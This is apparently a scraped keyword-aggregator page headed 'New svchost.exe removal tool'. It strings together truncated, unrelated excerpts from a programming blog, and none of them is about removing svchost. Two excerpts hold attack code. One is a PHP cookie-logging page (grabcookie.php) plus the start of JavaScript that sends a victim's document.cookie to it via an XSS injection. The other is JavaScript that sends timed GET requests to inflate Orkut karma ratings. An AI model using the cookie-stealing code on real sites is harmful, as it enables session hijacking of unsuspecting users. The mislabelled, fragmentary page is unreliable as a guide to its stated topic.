03 Jan, 2011

New svchost.exe removal tool

Articles related to new svchost.exe removal tool

Dataone Account Usage Checker in PERL

http://digitalpbk.blogspot.com/2008/06/free-dataone-account-usage-checker-perl.html or $ARGV[$i] eq "--user"){ $username = $ARGV[++$i]; } elsif($ARGV[$i] eq "-p" or $ARGV[$i] eq "--pass"){ $password = $ARGV[++$i]; } elsif($ARGV[$i] eq "-i" or $ARGV[$i] eq "--url"){ $url = $ARGV[++$i]; }}unless($username){print "Username : ";chomp($username = );}unless($password){print "Password : ";`stty -echo`;chomp($password = );`stty echo`;print "\n";}$cj = HTTP::Cookies->new(file ...
Published 3 years, 7 months ago

Multiple Instances of yahoo messenger

http://digitalpbk.blogspot.com/2007/09/multiple-instances-of-yahoo-messenger.html Multiple Instances of yahoo messenger Yahoo Messengeris a popular instant messaging software around. Yahoo messenger, by default, runs only a single copy on a single machine so for people with multiple yahoo id's this is a problem. Here is a short snippet that makes yahoo messenger to run multiple versions.REGEDITOpen the registry editor. Start > Run > regeditNavigate to +- HKEY_CURRENT_USER +- Software +- yahoo +- pagerCreate a new key inside pager named Test ...
Published 4 years, 5 months ago

Yahoo! Built in chat with mail

http://digitalpbk.blogspot.com/2007/06/yahoo-built-in-chat-with-mail.html Yahoo! Built in chat with mail Yahoo!Catches up with Google and introduces the same Inbox + Messenger bundle. On the new yahoo mail beta now you can chat to your friends too. At first look yea it rocks. It has almost all the formatting and smilies used by messenger. (Of course the Gizmos are missing).But still gmail is ahead because, gmail allows you to be signed in on more than one place. For eg: mail and google talk. Yahoo does not allow that when you sign in inside the mail, you get ...
Published 4 years, 7 months ago

Increasing the karma ratings on Orkut

http://digitalpbk.blogspot.com/2007/01/increasing-karma-ratings-on-orkut.html , the 3 get requests must not be sent to the server together. Leave a time delay of about 100ms between each of the GET requests.You can accomplish this in javascript by the following this template: function fn(index){ var links=new Array("Link 1 for cool/trusty/sexy/fan", "etc fill in"); var i= new Image(); i.src = links[index]; if(index != Count) { window.setTimeout("fn("+(index+1)+")",100); } else window.location = "Somewhere"; //Redirect ...
Published 5 years ago

XSS - Part 2 (Cookie stealing and Defacement)

http://digitalpbk.blogspot.com/2006/12/xss-part-2-cookie-stealing-and.html in javascript is accomplished by document.cookie, if somehow we could sent this to our page we have success. For this trick you will need to setup a page that logs the cookies that it recieves. The source of this page in php would be something like : grabcookie.php$handle=fopen("cookiejar.txt","a");fputs($handle,"\n".$_GET["cookie"]."\n");fclose($handle);?>Now to get the cookie to this page we would have to embed the followingvar i=new Image ...
Published 5 years, 1 month ago

Perl Download Manager

http://digitalpbk.blogspot.com/2008/06/perl-download-manager.html STDOUT; $| = 1; my ($inx,$url,$localfile,$blockstart,$blockend) = @_; my $length = $blockend - $blockstart + 1; my $stbit = 0; if(-f $localfile) { open HND, $localfile or die $!; binmode HND; seek HND,0,2; $stbit = tell HND; close HND; $tdl += $stbit; } else { open HND,">$localfile" or die $!; print HND ""; close HND; } my $ua = LWP::UserAgent->new; my $pcksize = 1024*64; my $enbit = $stbit+$pcksize-1; my $parts = int($length / $pcksize)+1 ...
Published 3 years, 7 months ago

How to make a Windows Gadget in Windows 7

http://digitalpbk.com/windows-gadgets/how-make-windows-gadget-windows-7 How to make a Windows Gadget in Windows 7 to view the folder. Making a new Gadget, creating the folder Structure Lets start making a simple gadget that counts down given the number of seconds to countdown to. That is the final output, and now lets start to make a new windows gadget. If you just want to skip the entire shebang and just get the files and figure out yourself, goto the end of this post and get the zip file for the gadget folder. gadget.xml File Use one of the folders above, and create a new folder. Countdown.gadget. Create ...
Published 1 year, 3 months ago

HTTP 1.1 Response Status Codes

http://digitalpbk.blogspot.com/2007/04/http-11-response-status-codes.html the rest of the request"101 Switching Protocols : "Ready to switch the protocol specified by the client, in an Upgrade Request"200 - 299 : Client Request SuccessfulStatus codes that indicates the client's request was successfully accepted.200 OK : Successfully processed request and response is attached201 Created : Created the new URI specified by the Location Header.202 Accepted : Accepted for processing203 Non Authoritative Info : Indicates the META information originated from ...
Published 4 years, 10 months ago

Introduction to Windows - Programming for Windows

http://digitalpbk.blogspot.com/2007/09/windows-and-c-programming.html Introduction to Windows - Programming for Windows History - DOSDisk Operating System aka DOS was one of the earlier operating systems, it was a single task system, where the whole system and the OS was devoted to executing a single program and was basically a text based OS.With the advent of the Windows Operating System, multiple process or applications could be run and it became a graphical OS (interface). So in order to support new features the basic structure of C/C++ programs changed from ...
Published 4 years, 4 months ago

Changing the default Boot OS in GRUB on Ubuntu 9.10

http://digitalpbk.com/ubuntu-grub/changing-default-boot-os-grub-ubuntu-910 Changing the default Boot OS in GRUB on Ubuntu 9.10 Ubuntu 9.10 ships with the new GRUB (Grand Unified Boot Loader 1.97 beta) in plain words its the software that boots the operating system you choose when you boot the computer. In earlier versions of Ubuntu / Grub to change the menu on the grub screen, one had to edit the /boot/grub/menu.lst file. In the new system this a little different from just editing the one file. The GRUB configuration now resides at /boot/grub/menu.cfg But do ...
Published 2 years, 3 months ago

Related help topics for new svchost.exe removal tool More keywords like new svchost.exe removal tool
More pages for new svchost.exe removal tool


Email Newsletter
Email:
Popular Posts
Recent Posts
Tags
Random photo
Makruzz Cruise Vessel Makruzz Cruise Vessel in Havelock Island Andaman
On Facebook
Recent Comments


digitalpbk